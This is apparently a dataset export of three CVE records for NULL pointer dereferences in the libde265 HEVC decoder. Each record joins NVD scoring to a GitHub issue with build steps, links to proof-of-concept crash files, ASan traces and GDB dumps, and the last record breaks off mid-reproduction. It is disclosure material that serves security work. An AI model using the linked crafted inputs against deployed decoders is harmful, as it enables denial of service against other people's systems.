CVE-2023-24756 | 2023-03-01T15:15:11.623 | libde265 v1.0.10 was discovered to contain a NULL pointer dereference in the ff_hevc_put_unweighted_pred_8_sse function at sse-motion.cc. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input file. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/strukturag/libde265/issues/380"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/03/msg00004.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/strukturag/libde265/issues/380"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/03/msg00004.html"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:struktur:libde265:1.0.10:*:*:*:*:*:*:*",
"matchCriteriaId": "C99171A4-8D0A-441C-98FE-0D24B39BFFE4",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*",
"matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"476"
] | 476 | https://github.com/strukturag/libde265/issues/380 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"strukturag",
"libde265"
] | # Description
NULL Pointer Dereference in function ff_hevc_put_unweighted_pred_8_sse at sse-motion.cc:116
# Version
```
git log
commit 7ea8e3cbb010bc02fa38419e87ed2281d7933850 (HEAD -> master, origin/master, origin/HEAD)
Author: Dirk Farin <dirk.farin@gmail.com>
Date: Sat Jan 28 15:03:34 2023 +0100
```
# Steps to reproduce
```
git clone https://github.com/strukturag/libde265.git
cd libde265
./autogen.sh
export CFLAGS="-g -O0 -lpthread -fsanitize=address"
export CXXFLAGS="-g -O0 -lpthread -fsanitize=address"
export LDFLAGS="-fsanitize=address"
./configure --disable-shared
make -j
```
```
cd dec265
./dec265 ./poc_segv07.bin
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: CTB outside of image area (concealing stream error...)
WARNING: CTB outside of image area (concealing stream error...)
WARNING: CTB outside of image area (concealing stream error...)
AddressSanitizer:DEADLYSIGNAL
=================================================================
==3406714==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x55555570a768 bp 0x7ffffffe28e0 sp 0x7ffffffe2620 T0)
==3406714==The signal is caused by a WRITE memory access.
==3406714==Hint: address points to the zero page.
#0 0x55555570a767 in _mm_storeu_si128(long long __vector(2)*, long long __vector(2)) /usr/lib/gcc/x86_64-linux-gnu/9/include/emmintrin.h:727
#1 0x55555570a767 in ff_hevc_put_unweighted_pred_8_sse(unsigned char*, long, short const*, long, int, int) /home/fuzz/libde265/libde265/x86/sse-motion.cc:116
#2 0x5555557b9e08 in acceleration_functions::put_unweighted_pred(void*, long, short const*, long, int, int, int) const ../libde265/acceleration.h:260
#3 0x5555557a2a90 in generate_inter_prediction_samples(base_context*, slice_segment_header const*, de265_image*, int, int, int, int, int, int, int, PBMotion const*) /home/fuzz/libde265/libde265/motion.cc:611
#4 0x5555557b973e in decode_prediction_unit(base_context*, slice_segment_header const*, de265_image*, PBMotionCoding const&, int, int, int, int, int, int, int, int) /home/fuzz/libde265/libde265/motion.cc:2155
#5 0x555555683316 in read_prediction_unit(thread_context*, int, int, int, int, int, int, int, int, int) /home/fuzz/libde265/libde265/slice.cc:4136
#6 0x555555687a08 in read_coding_unit(thread_context*, int, int, int, int) /home/fuzz/libde265/libde265/slice.cc:4500
#7 0x555555689e17 in read_coding_quadtree(thread_context*, int, int, int, int) /home/fuzz/libde265/libde265/slice.cc:4652
#8 0x555555672a97 in read_coding_tree_unit(thread_context*) /home/fuzz/libde265/libde265/slice.cc:2861
#9 0x55555568af7b in decode_substream(thread_context*, bool, bool) /home/fuzz/libde265/libde265/slice.cc:4741
#10 0x55555568ea3f in read_slice_segment_data(thread_context*) /home/fuzz/libde265/libde265/slice.cc:5054
#11 0x55555558c205 in decoder_context::decode_slice_unit_sequential(image_unit*, slice_unit*) /home/fuzz/libde265/libde265/decctx.cc:852
#12 0x55555558d6c0 in decoder_context::decode_slice_unit_parallel(image_unit*, slice_unit*) /home/fuzz/libde265/libde265/decctx.cc:954
#13 0x55555558a7dc in decoder_context::decode_some(bool*) /home/fuzz/libde265/libde265/decctx.cc:739
#14 0x555555589efc in decoder_context::read_slice_NAL(bitreader&, NAL_unit*, nal_header&) /home/fuzz/libde265/libde265/decctx.cc:697
#15 0x55555559070e in decoder_context::decode_NAL(NAL_unit*) /home/fuzz/libde265/libde265/decctx.cc:1239
#16 0x555555592354 in decoder_context::decode(int*) /home/fuzz/libde265/libde265/decctx.cc:1327
#17 0x55555557cffa in de265_decode /home/fuzz/libde265/libde265/de265.cc:362
#18 0x555555577b2f in main /home/fuzz/libde265/dec265/dec265.cc:764
#19 0x7ffff7046082 in __libc_start_main ../csu/libc-start.c:308
#20 0x5555555712ed in _start (/home/fuzz/libde265/dec265/dec265+0x1d2ed)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /usr/lib/gcc/x86_64-linux-gnu/9/include/emmintrin.h:727 in _mm_storeu_si128(long long __vector(2)*, long long __vector(2))
==3406714==ABORTING
```
# POC
[poc_segv07.bin](https://github.com/JieyongMa/poc/raw/main/libde265/poc_segv07.bin)
# GDB
```
gdb --args ./dec265 ./poc_segv07.bin
─── Output/messages ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: CTB outside of image area (concealing stream error...)
WARNING: CTB outside of image area (concealing stream error...)
WARNING: CTB outside of image area (concealing stream error...)
Program received signal SIGSEGV, Segmentation fault.
0x000055555570a768 in _mm_storeu_si128(long long __vector(2)*, long long __vector(2)) (__B=..., __P=0x0) at /usr/lib/gcc/x86_64-linux-gnu/9/include/emmintrin.h:727
727 *__P = __B;
─── Assembly ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
0x000055555570a74c _mm_storeu_si128(long long __vector(2)*, long long __vector(2))+101 mov $0x10,%esi
0x000055555570a751 _mm_storeu_si128(long long __vector(2)*, long long __vector(2))+106 mov %rdx,%rdi
0x000055555570a754 _mm_storeu_si128(long long __vector(2)*, long long __vector(2))+109 callq 0x555555571040 <__asan_report_store_n@plt>
0x000055555570a759 _mm_storeu_si128(long long __vector(2)*, long long __vector(2))+114 movdqa -0x1b0(%rbp),%xmm0
0x000055555570a761 _mm_storeu_si128(long long __vector(2)*, long long __vector(2))+122 mov -0x258(%rbp),%rdx
0x000055555570a768 _mm_storeu_si128(long long __vector(2)*, long long __vector(2))+129 movups %xmm0,(%rdx)
0x000055555570a76b _mm_storeu_si128(long long __vector(2)*, long long __vector(2))+132 nop
~
~
~
─── Breakpoints ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
─── Expressions ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
─── History ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
─── Memory ───────────────────────────────────────────────────────────────────────────���────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
─── Registers ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
rax 0x000055555581d520 rbx 0x00007ffffffeed20 rcx 0x0000000000000000 rdx 0x0000000000000000 rsi 0x0000000000000007 rdi 0x0000000000000000 rbp 0x00007ffffffe2890 rsp 0x00007ffffffe25d0
r8 0x0000000000000000 r9 0x0000000000000020 r10 0x0000000000000020 r11 0x0000000000000020 r12 0x000055555581d520 r13 0x0000000000000010 r14 0x00000fffffffc54c r15 0x00007ffffffe2a60
rip 0x000055555570a768 eflags [ PF ZF IF RF ] cs 0x00000033 ss 0x0000002b ds 0x00000000 es 0x00000000 fs 0x00000000 gs 0x00000000
─── Source ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
722 }
723
724 extern __inline void __attribute__((__gnu_inline__, __always_inline__, __artificial__))
725 _mm_storeu_si128 (__m128i_u *__P, __m128i __B)
726 {
727 *__P = __B;
728 }
729
730 extern __inline void __attribute__((__gnu_inline__, __always_inline__, __artificial__))
731 _mm_storel_epi64 (__m128i_u *__P, __m128i __B)
─── Stack ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
[0] from 0x000055555570a768 in _mm_storeu_si128(long long __vector(2)*, long long __vector(2))+129 at /usr/lib/gcc/x86_64-linux-gnu/9/include/emmintrin.h:727
[1] from 0x000055555570a768 in ff_hevc_put_unweighted_pred_8_sse(unsigned char*, long, short const*, long, int, int)+1426 at sse-motion.cc:116
[2] from 0x00005555557b9e09 in acceleration_functions::put_unweighted_pred(void*, long, short const*, long, int, int, int) const+281 at ../libde265/acceleration.h:260
[3] from 0x00005555557a2a91 in generate_inter_prediction_samples(base_context*, slice_segment_header const*, de265_image*, int, int, int, int, int, int, int, PBMotion const*)+22773 at motion.cc:611
[4] from 0x00005555557b973f in decode_prediction_unit(base_context*, slice_segment_header const*, de265_image*, PBMotionCoding const&, int, int, int, int, int, int, int, int)+496 at motion.cc:2155
[5] from 0x0000555555683317 in read_prediction_unit(thread_context*, int, int, int, int, int, int, int, int, int)+2790 at slice.cc:4136
[6] from 0x0000555555687a09 in read_coding_unit(thread_context*, int, int, int, int)+14764 at slice.cc:4500
[7] from 0x0000555555689e18 in read_coding_quadtree(thread_context*, int, int, int, int)+3873 at slice.cc:4652
[8] from 0x0000555555672a98 in read_coding_tree_unit(thread_context*)+1351 at slice.cc:2861
[9] from 0x000055555568af7c in decode_substream(thread_context*, bool, bool)+4333 at slice.cc:4741
[+]
─── Threads ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
[1] id 3410517 name dec265 from 0x000055555570a768 in _mm_storeu_si128(long long __vector(2)*, long long __vector(2))+129 at /usr/lib/gcc/x86_64-linux-gnu/9/include/emmintrin.h:727
─── Variables ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
arg __B = {[0] = 0, [1] = 0}, __P = 0x0: Cannot access memory at address 0x0
loc x = 0, y = 0, dst = 0x0: Cannot access memory at address 0x0, r0 = {[0] = 0, [1] = 0}, r1 = {[0] = 0, [1] = 0}, f0 = {[0] = 9007336695791648, [1] = 9007336695791648}
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
>>>
```
# Impact
This vulnerability is capable of crashing software, causing a denial of service via a crafted input file. | NULL Pointer Dereference in function ff_hevc_put_unweighted_pred_8_sse at sse-motion.cc:116 | https://api.github.com/repos/strukturag/libde265/issues/380/comments | 1 | 2023-01-29T08:12:53Z | 2023-03-04T07:41:52Z | https://github.com/strukturag/libde265/issues/380 | 1,561,180,071 | 380 | 4,780 |
CVE-2023-24757 | 2023-03-01T15:15:11.683 | libde265 v1.0.10 was discovered to contain a NULL pointer dereference in the put_unweighted_pred_16_fallback function at fallback-motion.cc. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input file. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/strukturag/libde265/issues/385"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/03/msg00004.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/strukturag/libde265/issues/385"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/03/msg00004.html"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:struktur:libde265:1.0.10:*:*:*:*:*:*:*",
"matchCriteriaId": "C99171A4-8D0A-441C-98FE-0D24B39BFFE4",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*",
"matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"476"
] | 476 | https://github.com/strukturag/libde265/issues/385 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"strukturag",
"libde265"
] | # Description
NULL Pointer Dereference in function put_unweighted_pred_16_fallback at fallback-motion.cc:179
# Version
```
git log
commit 7ea8e3cbb010bc02fa38419e87ed2281d7933850 (HEAD -> master, origin/master, origin/HEAD)
Author: Dirk Farin <dirk.farin@gmail.com>
Date: Sat Jan 28 15:03:34 2023 +0100
```
# Steps to reproduce
```
git clone https://github.com/strukturag/libde265.git
cd libde265
./autogen.sh
export CFLAGS="-g -O0 -lpthread -fsanitize=address"
export CXXFLAGS="-g -O0 -lpthread -fsanitize=address"
export LDFLAGS="-fsanitize=address"
./configure --disable-shared
make -j
```
```
cd dec265
./dec265 ./poc_segv09.bin
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: slice header invalid
WARNING: CTB outside of image area (concealing stream error...)
WARNING: slice header invalid
WARNING: slice header invalid
WARNING: faulty reference picture list
WARNING: maximum number of reference pictures exceeded
WARNING: faulty reference picture list
WARNING: maximum number of reference pictures exceeded
WARNING: faulty reference picture list
WARNING: slice header invalid
WARNING: non-existing PPS referenced
AddressSanitizer:DEADLYSIGNAL
=================================================================
==3774965==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x5555555e7237 bp 0x7ffffffe28d0 sp 0x7ffffffe2880 T0)
==3774965==The signal is caused by a WRITE memory access.
==3774965==Hint: address points to the zero page.
#0 0x5555555e7236 in put_unweighted_pred_16_fallback(unsigned short*, long, short const*, long, int, int, int) /home/fuzz/libde265/libde265/fallback-motion.cc:179
#1 0x5555557b9ed3 in acceleration_functions::put_unweighted_pred(void*, long, short const*, long, int, int, int) const ../libde265/acceleration.h:262
#2 0x5555557a2a90 in generate_inter_prediction_samples(base_context*, slice_segment_header const*, de265_image*, int, int, int, int, int, int, int, PBMotion const*) /home/fuzz/libde265/libde265/motion.cc:611
#3 0x5555557b973e in decode_prediction_unit(base_context*, slice_segment_header const*, de265_image*, PBMotionCoding const&, int, int, int, int, int, int, int, int) /home/fuzz/libde265/libde265/motion.cc:2155
#4 0x555555683316 in read_prediction_unit(thread_context*, int, int, int, int, int, int, int, int, int) /home/fuzz/libde265/libde265/slice.cc:4136
#5 0x5555556878c1 in read_coding_unit(thread_context*, int, int, int, int) /home/fuzz/libde265/libde265/slice.cc:4497
#6 0x555555689e17 in read_coding_quadtree(thread_context*, int, int, int, int) /home/fuzz/libde265/libde265/slice.cc:4652
#7 0x555555672a97 in read_coding_tree_unit(thread_context*) /home/fuzz/libde265/libde265/slice.cc:2861
#8 0x55555568af7b in decode_substream(thread_context*, bool, bool) /home/fuzz/libde265/libde265/slice.cc:4741
#9 0x55555568ea3f in read_slice_segment_data(thread_context*) /home/fuzz/libde265/libde265/slice.cc:5054
#10 0x55555558c205 in decoder_context::decode_slice_unit_sequential(image_unit*, slice_unit*) /home/fuzz/libde265/libde265/decctx.cc:852
#11 0x55555558d6c0 in decoder_context::decode_slice_unit_parallel(image_unit*, slice_unit*) /home/fuzz/libde265/libde265/decctx.cc:954
#12 0x55555558a7dc in decoder_context::decode_some(bool*) /home/fuzz/libde265/libde265/decctx.cc:739
#13 0x555555589efc in decoder_context::read_slice_NAL(bitreader&, NAL_unit*, nal_header&) /home/fuzz/libde265/libde265/decctx.cc:697
#14 0x55555559070e in decoder_context::decode_NAL(NAL_unit*) /home/fuzz/libde265/libde265/decctx.cc:1239
#15 0x555555592354 in decoder_context::decode(int*) /home/fuzz/libde265/libde265/decctx.cc:1327
#16 0x55555557cffa in de265_decode /home/fuzz/libde265/libde265/de265.cc:362
#17 0x555555577b2f in main /home/fuzz/libde265/dec265/dec265.cc:764
#18 0x7ffff7046082 in __libc_start_main ../csu/libc-start.c:308
#19 0x5555555712ed in _start (/home/fuzz/libde265/dec265/dec265+0x1d2ed)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/fuzz/libde265/libde265/fallback-motion.cc:179 in put_unweighted_pred_16_fallback(unsigned short*, long, short const*, long, int, int, int)
==3774965==ABORTING
```
# POC
[poc_segv09.bin](https://github.com/JieyongMa/poc/raw/main/libde265/poc_segv09.bin)
# GDB
```
gdb --args ./dec265 ./poc_segv09.bin
─── Output/messages ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
WARNING: slice header invalid
WARNING: CTB outside of image area (concealing stream error...)
WARNING: slice header invalid
WARNING: slice header invalid
WARNING: faulty reference picture list
WARNING: maximum number of reference pictures exceeded
WARNING: faulty reference picture list
WARNING: maximum number of reference pictures exceeded
WARNING: faulty reference picture list
WARNING: slice header invalid
WARNING: non-existing PPS referenced
Program received signal SIGSEGV, Segmentation fault.
0x00005555555e7237 in put_unweighted_pred_16_fallback (dst=0x0, dststride=0, src=0x7ffffffe6c00, srcstride=8, width=8, height=8, bit_depth=10) at fallback-motion.cc:179
179 out[0] = Clip_BitDepth((in[0] + offset1)>>shift1, bit_depth);
─── Assembly ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
0x00005555555e7226 put_unweighted_pred_16_fallback(unsigned short*, long, short const*, long, int, int, int)+1689 test %sil,%sil
0x00005555555e7229 put_unweighted_pred_16_fallback(unsigned short*, long, short const*, long, int, int, int)+1692 je 0x5555555e7233 <put_unweighted_pred_16_fallback(unsigned short*, long, short const*, long, int, int, int)+1702>
0x00005555555e722b put_unweighted_pred_16_fallback(unsigned short*, long, short const*, long, int, int, int)+1694 mov %rdx,%rdi
0x00005555555e722e put_unweighted_pred_16_fallback(unsigned short*, long, short const*, long, int, int, int)+1697 callq 0x555555570ef0 <__asan_report_store2@plt>
0x00005555555e7233 put_unweighted_pred_16_fallback(unsigned short*, long, short const*, long, int, int, int)+1702 mov -0x8(%rbp),%rdx
0x00005555555e7237 put_unweighted_pred_16_fallback(unsigned short*, long, short const*, long, int, int, int)+1706 mov %cx,(%rdx)
0x00005555555e723a put_unweighted_pred_16_fallback(unsigned short*, long, short const*, long, int, int, int)+1709 mov -0x10(%rbp),%rdx
0x00005555555e723e put_unweighted_pred_16_fallback(unsigned short*, long, short const*, long, int, int, int)+1713 lea 0x2(%rdx),%rsi
0x00005555555e7242 put_unweighted_pred_16_fallback(unsigned short*, long, short const*, long, int, int, int)+1717 mov %rsi,%rdx
0x00005555555e7245 put_unweighted_pred_16_fallback(unsigned short*, long, short const*, long, int, int, int)+1720 mov %rdx,%rcx
─── Breakpoints ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
─── Expressions ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
─── History ─────────────────────────────────────────────────────────────���─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
─── Memory ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
─── Registers ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
rax 0x000055555581d520 rbx 0x00007ffffffeed20 rcx 0x0000000000000000 rdx 0x0000000000000000 rsi 0x0000000000000000 rdi 0x0000000000000000 rbp 0x00007ffffffe2880 rsp 0x00007ffffffe2830
r8 0x0000000000000001 r9 0x0000000000000008 r10 0x00005555555e6b8d r11 0x0000000000000020 r12 0x000055555581d520 r13 0x0000000000000010 r14 0x00000fffffffc54c r15 0x00007ffffffe2a60
rip 0x00005555555e7237 eflags [ PF ZF IF RF ] cs 0x00000033 ss 0x0000002b ds 0x00000000 es 0x00000000 fs 0x00000000 gs 0x00000000
─── Source ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
174 for (int y=0;y<height;y++) {
175 const int16_t* in = &src[y*srcstride];
176 uint16_t* out = &dst[y*dststride];
177
178 for (int x=0;x<width;x+=2) {
179 out[0] = Clip_BitDepth((in[0] + offset1)>>shift1, bit_depth);
180 out[1] = Clip_BitDepth((in[1] + offset1)>>shift1, bit_depth);
181 out+=2; in+=2;
182 }
183 }
─── Stack ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
[0] from 0x00005555555e7237 in put_unweighted_pred_16_fallback(unsigned short*, long, short const*, long, int, int, int)+1706 at fallback-motion.cc:179
[1] from 0x00005555557b9ed4 in acceleration_functions::put_unweighted_pred(void*, long, short const*, long, int, int, int) const+484 at ../libde265/acceleration.h:262
[2] from 0x00005555557a2a91 in generate_inter_prediction_samples(base_context*, slice_segment_header const*, de265_image*, int, int, int, int, int, int, int, PBMotion const*)+22773 at motion.cc:611
[3] from 0x00005555557b973f in decode_prediction_unit(base_context*, slice_segment_header const*, de265_image*, PBMotionCoding const&, int, int, int, int, int, int, int, int)+496 at motion.cc:2155
[4] from 0x0000555555683317 in read_prediction_unit(thread_context*, int, int, int, int, int, int, int, int, int)+2790 at slice.cc:4136
[5] from 0x00005555556878c2 in read_coding_unit(thread_context*, int, int, int, int)+14437 at slice.cc:4497
[6] from 0x0000555555689e18 in read_coding_quadtree(thread_context*, int, int, int, int)+3873 at slice.cc:4652
[7] from 0x0000555555672a98 in read_coding_tree_unit(thread_context*)+1351 at slice.cc:2861
[8] from 0x000055555568af7c in decode_substream(thread_context*, bool, bool)+4333 at slice.cc:4741
[9] from 0x000055555568ea40 in read_slice_segment_data(thread_context*)+1762 at slice.cc:5054
[+]
─── Threads ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
[1] id 3779666 name dec265 from 0x00005555555e7237 in put_unweighted_pred_16_fallback(unsigned short*, long, short const*, long, int, int, int)+1706 at fallback-motion.cc:179
─── Variables ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
arg dst = 0x0: Cannot access memory at address 0x0, dststride = 0, src = 0x7ffffffe6c00: 0, srcstride = 8, width = 8, height = 8, bit_depth = 10
loc x = 0, in = 0x7ffffffe6c00: 0, out = 0x0: Cannot access memory at address 0x0, y = 0, shift1 = 4, offset1 = 8, __PRETTY_FUNCTION__ = "void put_unweighted_pred_16_fallback(uint16_t*, ptrdiff_t, const int16_t*, ptrdiff_t, int, int, int…
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
>>>
```
# Impact
This vulnerability is capable of crashing software, causing a denial of service via a crafted input file.
| NULL Pointer Dereference in function put_unweighted_pred_16_fallback at fallback-motion.cc:179 | https://api.github.com/repos/strukturag/libde265/issues/385/comments | 2 | 2023-01-29T08:16:20Z | 2023-03-04T07:42:01Z | https://github.com/strukturag/libde265/issues/385 | 1,561,181,036 | 385 | 4,781 |
CVE-2023-24758 | 2023-03-01T15:15:11.743 | libde265 v1.0.10 was discovered to contain a NULL pointer dereference in the ff_hevc_put_weighted_pred_avg_8_sse function at sse-motion.cc. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input file. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/strukturag/libde265/issues/383"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/03/msg00004.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/strukturag/libde265/issues/383"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/03/msg00004.html"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:struktur:libde265:1.0.10:*:*:*:*:*:*:*",
"matchCriteriaId": "C99171A4-8D0A-441C-98FE-0D24B39BFFE4",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*",
"matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"476"
] | 476 | https://github.com/strukturag/libde265/issues/383 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"strukturag",
"libde265"
] | # Description
NULL Pointer Dereference in function ff_hevc_put_weighted_pred_avg_8_sse at sse-motion.cc:254
# Version
```
git log
commit 7ea8e3cbb010bc02fa38419e87ed2281d7933850 (HEAD -> master, origin/master, origin/HEAD)
Author: Dirk Farin <dirk.farin@gmail.com>
Date: Sat Jan 28 15:03:34 2023 +0100
```
# Steps to reproduce
```
git clone https://github.com/strukturag/libde265.git
cd libde265
./autogen.sh
export CFLAGS="-g -O0 -lpthread -fsanitize=address"
export CXXFLAGS="-g -O0 -lpthread -fsanitize=address"
export LDFLAGS="-fsanitize=address"
./configure --disable-shared
make -j
```
```
cd dec265
./dec265 ./poc_segv06.bin
WARNING: non-existing PPS referenced
WARNING: non-existing PPS referenced
